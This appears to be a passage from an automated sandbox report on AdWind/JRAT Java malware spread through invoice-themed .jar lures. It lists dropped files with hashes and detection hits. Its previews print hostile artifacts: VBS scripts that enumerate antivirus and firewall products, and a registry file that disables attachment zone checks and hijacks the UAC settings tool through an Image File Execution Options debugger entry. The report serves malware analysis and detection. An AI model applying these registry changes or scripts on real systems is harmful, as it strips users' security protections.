                                                                                                                                                                                                                FACTURA.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                                                  FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                                                    SecuriteInfo.com.Trojan.Siggen22.58997.11289.5716.exeGet hashmaliciousPoisonivyBrowse
                                                                                                                                                                                                                      Purchase Orders-Reg.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                                                        SecuriteInfo.com.Trojan.Siggen23.5328.29386.24001.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          SecuriteInfo.com.BScope.Adware.Softcnapp.31344.28361.exeGet hashmaliciousPoisonivyBrowse
                                                                                                                                                                                                                            SecuriteInfo.com.BScope.Adware.Softcnapp.31344.28361.exeGet hashmaliciousPoisonivyBrowse
                                                                                                                                                                                                                              Swift Advice $31,470.00.jarGet hashmaliciousADWINDBrowse
                                                                                                                                                                                                                                4.jarGet hashmaliciousADWINDBrowse

                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                  C:\ProgramData\Oracle\Java\.oracle_jre_usage\b5820291038aa69c.timestamp

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):52
                                                                                                                                                                                                                                  Entropy (8bit):4.7526664005421635
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:oFj4I5vpm4USZ+US7y:oJ5bALO
                                                                                                                                                                                                                                  MD5:DF5F6AD06CBB1F09DA908F9C7EB0D60A
                                                                                                                                                                                                                                  SHA1:7CFDA688402599F42ACE4CD123B516E2521E32B5
                                                                                                                                                                                                                                  SHA-256:BCC833705C019B5FF2C56B14D20DAEAAD6DEFB3EC723A016F3DA1349EEBCF847
                                                                                                                                                                                                                                  SHA-512:B68AB3C6A50A7ADB97CAD1F6ACC6CA48C2980DA3AEB11044B8AE53514586AFB003FE6F18D76A96B1A704BC88BA765523021B172FE03F52D71577E3E13F1914A9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:C:\Program Files (x86)\Java\jre-1.8..1713330117217..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                                                  Entropy (8bit):5.093300055314052
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTQQQavbx3la2Zp6djsyn:vmtqvAndZFcQU9lrXyjsyn
                                                                                                                                                                                                                                  MD5:A32C109297ED1CA155598CD295C26611
                                                                                                                                                                                                                                  SHA1:DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
                                                                                                                                                                                                                                  SHA-256:45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
                                                                                                                                                                                                                                  SHA-512:70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  Preview:Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""FIREWALL"":""" & .displayName & """}".. End With..Next..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):276
                                                                                                                                                                                                                                  Entropy (8bit):5.064973526456738
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTrLavbx3laDH6djsyn:vmtqvAndZFcrG9lpjsyn
                                                                                                                                                                                                                                  MD5:3BDFD33017806B85949B6FAA7D4B98E4
                                                                                                                                                                                                                                  SHA1:F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
                                                                                                                                                                                                                                  SHA-256:9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
                                                                                                                                                                                                                                  SHA-512:AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  Preview:Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""AV"":""" & .displayName & """}".. End With..Next..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):276
                                                                                                                                                                                                                                  Entropy (8bit):5.064973526456738
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTrLavbx3laDH6djsyn:vmtqvAndZFcrG9lpjsyn
                                                                                                                                                                                                                                  MD5:3BDFD33017806B85949B6FAA7D4B98E4
                                                                                                                                                                                                                                  SHA1:F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
                                                                                                                                                                                                                                  SHA-256:9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
                                                                                                                                                                                                                                  SHA-512:AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  Preview:Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""AV"":""" & .displayName & """}".. End With..Next..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                                                  Entropy (8bit):5.093300055314052
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTQQQavbx3la2Zp6djsyn:vmtqvAndZFcQU9lrXyjsyn
                                                                                                                                                                                                                                  MD5:A32C109297ED1CA155598CD295C26611
                                                                                                                                                                                                                                  SHA1:DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
                                                                                                                                                                                                                                  SHA-256:45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
                                                                                                                                                                                                                                  SHA-512:70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  Preview:Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""FIREWALL"":""" & .displayName & """}".. End With..Next..

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):46592
                                                                                                                                                                                                                                  Entropy (8bit):6.0299567620950425
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:5iUNFqJL3HXiQl2DuhacwRZPE7dmvqID8ouM2PkYEDienAZu+P:TNFW33hdxwz87dmRDbkPKg
                                                                                                                                                                                                                                  MD5:0B7B52302C8C5DF59D960DD97E3ABDAF
                                                                                                                                                                                                                                  SHA1:D85524F464DCDED54EDFCFE6A5056F6C4008BBCB
                                                                                                                                                                                                                                  SHA-256:A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
                                                                                                                                                                                                                                  SHA-512:FA04A69CACD05042DC9F3EF0BB518B01952B59A5A2669BA3817C3E248E95F54801349CB51FCFA7CD1F3C4CB7C28615A61156D574C4F7197FDBA709544A5E8EBC
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_AdWind_dll, Description: Yara detected AdWind RAT\'s dll, Source: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll, Author: Joe Security
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                  • Filename: gcahfpmhcn.js, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: FACTURA.jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: FEDEX-TNT OVERDUE UNPAID INVOICE980055177856..jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: Purchase Orders-Reg.jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: Swift Advice $31,470.00.jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: nORDER 119A %26 1.jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: 27 payment swift copy of the remaining paymen.jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: DHLAWB907853880911.jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: Quotation.jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: fattura.jar, Detection: malicious, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.../../../..@.a.9..@.T.!..@.`.z..&.Y.*../..~..@.e....@.Q....@.W....Rich/..........PE..L.....uW...........!.....p...B......8...............................................R3....@.........................p..........<...............................<...`...............................0...@...............$............................text...Zo.......p.................. ..`.rdata..%%.......&...t..............@..@.data....+..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):247088
                                                                                                                                                                                                                                  Entropy (8bit):7.977146417027946
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:WI5pxUZ7Gvi8ulm+yV/rIF0/MO2qnan1J7pXESN6U:J5pxAGqNkrIq/MO2qnA
                                                                                                                                                                                                                                  MD5:781FB531354D6F291F1CCAB48DA6D39F
                                                                                                                                                                                                                                  SHA1:9CE4518EBCB5BE6D1F0B5477FA00C26860FE9A68
                                                                                                                                                                                                                                  SHA-256:97D585B6AFF62FB4E43E7E6A5F816DCD7A14BE11A88B109A9BA9E8CD4C456EB9
                                                                                                                                                                                                                                  SHA-512:3E6630F5FEB4A3EB1DAC7E9125CE14B1A2A45D7415CF44CEA42BC51B2A9AA37169EE4A4C36C888C8F2696E7D6E298E2AD7B2F4C22868AAA5948210EB7DB220D8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                  • Rule: MAL_JRAT_Oct18_1, Description: Detects JRAT malware, Source: C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class, Author: Florian Roth
                                                                                                                                                                                                                                  Preview:PK........A.QJ................META-INF/MANIFEST.MF....M.1..0...@...u.XA(.jq.bED..y.@LJ."..F;(.r..w..yPL.J!..$..5g..#.]O.Y..O|.u...x...8Q[..^.Zh.Pk.c.OL.Ck'h.Fc5g.8a.%@..0...I....V.E..&`g.j....wK.~w..@3G.:.1q...PK..\..........PK........A.QJ................iQA/Fjx/ywe.u..@....Y.u.....,.`D.#.......:q......P.Up....n...F.z8'...."....P.Fu.....{.Lw.M.r5...c.}..U.L*...^j{a'..0JF^r.Y......a.~.f\..z....p... .^.%.v.E.k..6aP..WZ...-#L.c).'B..#n.K.....A....npG....p).x..z..u... .e'.'.j...&<....H..]wJ.[.....|...].....[Xy...o.Dh.I....B........z.."7Lh.1."EU..7n.9......J50..12....#.!...%........[9U..7.e`[...7.*..\...\..t*.l....j"*..H..B.K....".!....!..p...\|<{U......8.6..7.4....e..5)%....}.0.N...O....A..x$..]......Cz..?.KUD=..)=....=c..b.4oD......U...U..i.'k.....@.....r:.t.\.n..n...+..'..,WE.B.M.n.. ..A.W.u.T...{`.=..[e3.C.p...._.LC..V..?....._...v;.|p.zw......._@....9...*5...J...2.!.#S..Oj....<]+.5)*+.u...d......\..u......w..n..>..-&B...!._b6.Mv.VS.W.e......."

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\hsperfdata_user\7388

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                  Entropy (8bit):1.2975761574449005
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:spPrcf8GSHYp8JxKcgi8gza20ST1HE19o2y:spS8GS4p8JxqgzaUxHEr
                                                                                                                                                                                                                                  MD5:28EE5F6F4A61561C305B671F7241D3A5
                                                                                                                                                                                                                                  SHA1:BE2DD045C844FD68C345596540084C969CBFA493
                                                                                                                                                                                                                                  SHA-256:70A0D0A5266B7CFB3518961D7C6BE3C36E9C154F2AAFCE153C47214561F99B2F
                                                                                                                                                                                                                                  SHA-512:0C60FD0064064D27C1F4D7DE822F8087C2D5AE2113F2BA8C0DAB27577FD29CAC58EAAD72C56451B83ED49BCCEB103B7B2076559B345F1E2D23C414A1724044D6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.........9........o..... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\hsperfdata_user\7564

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                  Entropy (8bit):1.284047418555765
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:s1Wur3o8GU4xCsvVHcgs8bzXrQIY2YuSTUHG1bowK:s1Wn8GU4xCsNHcg/MIUIHGd
                                                                                                                                                                                                                                  MD5:C872A0AA182C044112DE49CB788A5006
                                                                                                                                                                                                                                  SHA1:442969D787D2A17FF8D42F5FC98F80843AB70441
                                                                                                                                                                                                                                  SHA-256:244FC36F8716BB728B23D7FBE995030137F814B19F10BF5E6CE6539F8D59270E
                                                                                                                                                                                                                                  SHA-512:066D8E0788BAA622A20C9986F3B8FA2DFC22BA195A8D3B9D885681D6697E10F4B639956E1D43564ECD9B796DAC387FC76D45349E54ABB4AF75447213CCCAF304
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:........(9.......;...... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\hsperfdata_user\7620

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                  Entropy (8bit):1.290112597769506
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:pRorV88GGxMo0Khq62QwvhgM+KGkSTAkHG1bow/T:pRj8GGxd0Khq6FM+BEkHGd5
                                                                                                                                                                                                                                  MD5:2FE84F0F38D8CF78C60FF85EE6E1CC32
                                                                                                                                                                                                                                  SHA1:1CB7F8EA9F07A9724066563D95A9B64F97A3EB3C
                                                                                                                                                                                                                                  SHA-256:F5F8EE1E7B151C778866168106FA470F9309B7A681AF390137FF0E0DA4DBF177
                                                                                                                                                                                                                                  SHA-512:B4EFA729B2037E2BFC9A1A3ED279ED4B7D16EA9EBAFA748A860575EAB3226860145033DC680F9CDD43424E8374BCD3DB5E85D6EDD8E8A234A0036CBF07736C0A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:........89.......Q...... .......8...........J...0...sun.rt._sync_Inflations.............8...........J...0...sun.rt._sync_Deflations.............@...........J...8...sun.rt._sync_ContendedLockAttempts..........8...........J...0...sun.rt._sync_FutileWakeups..........0...........J...(...sun.rt._sync_Parks..........@...........J...8...sun.rt._sync_EmptyNotifications.............8...........J...0...sun.rt._sync_Notifications..........8...........J...0...sun.rt._sync_SlowEnter..............8...........J...0...sun.rt._sync_SlowExit...............8...........J...0...sun.rt._sync_SlowNotify.............8...........J...0...sun.rt._sync_SlowNotifyAll..........8...........J...0...sun.rt._sync_FailedSpins............@...........J...8...sun.rt._sync_SuccessfulSpins................8...........J...0...sun.rt._sync_PrivateA...............8...........J...0...sun.rt._sync_PrivateB...............@...........J...8...sun.rt._sync_MonInCirculation...............8...........J...0...sun.rt._sync_MonScavenged...

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):27676
                                                                                                                                                                                                                                  Entropy (8bit):5.348605489538693
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:PJWwXczWquqtVciCtmtatLitmtJCtTt6tVtatNtgtitCtztHtxtMt8thtVRtTtsw:PqgrnuR0hTmEgGpF
                                                                                                                                                                                                                                  MD5:22C27D345F6CEFF99DE5FE515991C4BF
                                                                                                                                                                                                                                  SHA1:9C80DD9FFC77E2666281404F6452F5BD48D2BBCB
                                                                                                                                                                                                                                  SHA-256:45497C7CA76F29C6786A8835BC1925A5F6CD219403DCE807FB34B98A630212B3
                                                                                                                                                                                                                                  SHA-512:6875B8B8C2C29860DB7FEB7AFA95379D4EE1B027BA7F30547BB99C30BF11FFC7D69A914AB029D23C8CE2B2A36DFFDE5117E76BA639A6DA9B349B62538740F773
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:Windows Registry Editor Version 5.00..[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments].."SaveZoneInformation"=dword:00000001....[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations].."LowRiskFileTypes"=".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;"....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments].."SaveZoneInformation"=-....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations].."LowRiskFileTypes"=-....[HKEY_CURRENT_USER\Environment].."SEE_MASK_NOZONECHECKS"="1"....[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment].."SEE_MASK_NOZONECHECKS"="1"....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe].."debugger"="svchost.exe"....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Poli

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\83aa4cc77f591dfc2374580bbd95f6ba_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):45
                                                                                                                                                                                                                                  Entropy (8bit):0.9111711733157262
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:/lwlt7n:WNn
                                                                                                                                                                                                                                  MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                                                                                                                                                                                                                  SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                                                                                                                                                                                                                  SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                                                                                                                                                                                                                  SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:........................................J2SE.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\COPYRIGHT

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ISO-8859 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3244
                                                                                                                                                                                                                                  Entropy (8bit):4.504275821607802
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:9kjJXQSqgbiihCrRbo+Q/cV0rDcFBL3P0/r3:9cAaOi01E+xV0rDaBL3P0z3
                                                                                                                                                                                                                                  MD5:18589215C840FB114AC6767738D809CD
                                                                                                                                                                                                                                  SHA1:E646DCDD27F62ADE3854A86EDE2217F7FFBA477F
                                                                                                                                                                                                                                  SHA-256:C0AD9E4CA8DBC341F1311927FABA2372F66B281D00F33A86D6811223CCF4F059
                                                                                                                                                                                                                                  SHA-512:71B3BA2C55437B3F1655FDB0732B93400C6683161102954747AA5E48774AF4569B361A9C18F3B16C632A65E2BB34723FA1FEAE7AE0C47E42F0209CF19BBD4183
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Copyright . 1993, 2023, Oracle and/or its affiliates..All rights reserved...This software and related documentation are provided under a.license agreement containing restrictions on use and.disclosure and are protected by intellectual property laws..Except as expressly permitted in your license agreement or.allowed by law, you may not use, copy, reproduce, translate,.broadcast, modify, license, transmit, distribute, exhibit,.perform, publish, or display any part, in any form, or by.any means. Reverse engineering, disassembly, or.decompilation of this software, unless required by law for.interoperability, is prohibited...The information contained herein is subject to change.without notice and is not warranted to be error-free. If you.find any errors, please report them to us in writing...If this is software or related documentation that is.delivered to the U.S. Government or anyone licensing it on.behalf of the U.S. Government, the following notice is.applicable:..U.S. GOVERNMENT END US

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\LICENSE

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):44
                                                                                                                                                                                                                                  Entropy (8bit):4.202972243293108
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:c3AXFshzYoQ6LJMXTn:c9hzYey
                                                                                                                                                                                                                                  MD5:2C311F1936F63834199DE94319A5CD8C
                                                                                                                                                                                                                                  SHA1:6C5F8A9EBAB689F905FEFE44ACA0A1F77D39E425
                                                                                                                                                                                                                                  SHA-256:2D5EC5B2984090D43BFB27C331B59BB537FBBBC9B5E015F1F94A5978372D293F
                                                                                                                                                                                                                                  SHA-512:E8A51E80F98098F601130D556AE42AF6A9162B382820A4D5AD7FEF9D68270626384B440E41E3208ACD0A61103404454FF5FBE6E0B5D1434ED759667ED7E5B8DF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Please refer to https://java.com/otnlicense.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\README.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):46
                                                                                                                                                                                                                                  Entropy (8bit):4.197049999347145
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:c3AXFshzhRSkU:c9hzhgkU
                                                                                                                                                                                                                                  MD5:0F1123976B959AC5E8B89EB8C245C4BD
                                                                                                                                                                                                                                  SHA1:F90331DF1E5BADEADC501D8DD70714C62A920204
                                                                                                                                                                                                                                  SHA-256:963095CF8DB76FB8071FD19A3110718A42F2AB42B27A3ADFD9EC58981C3E88D2
                                                                                                                                                                                                                                  SHA-512:E9136FDF42A4958138732318DF0B4BA363655D97F8449703A3B3A40DDB40EEFF56363267D07939889086A500CB9C9AAF887B73EEAD06231269116110A0C0A693
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:Please refer to http://java.com/licensereadme.

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):190
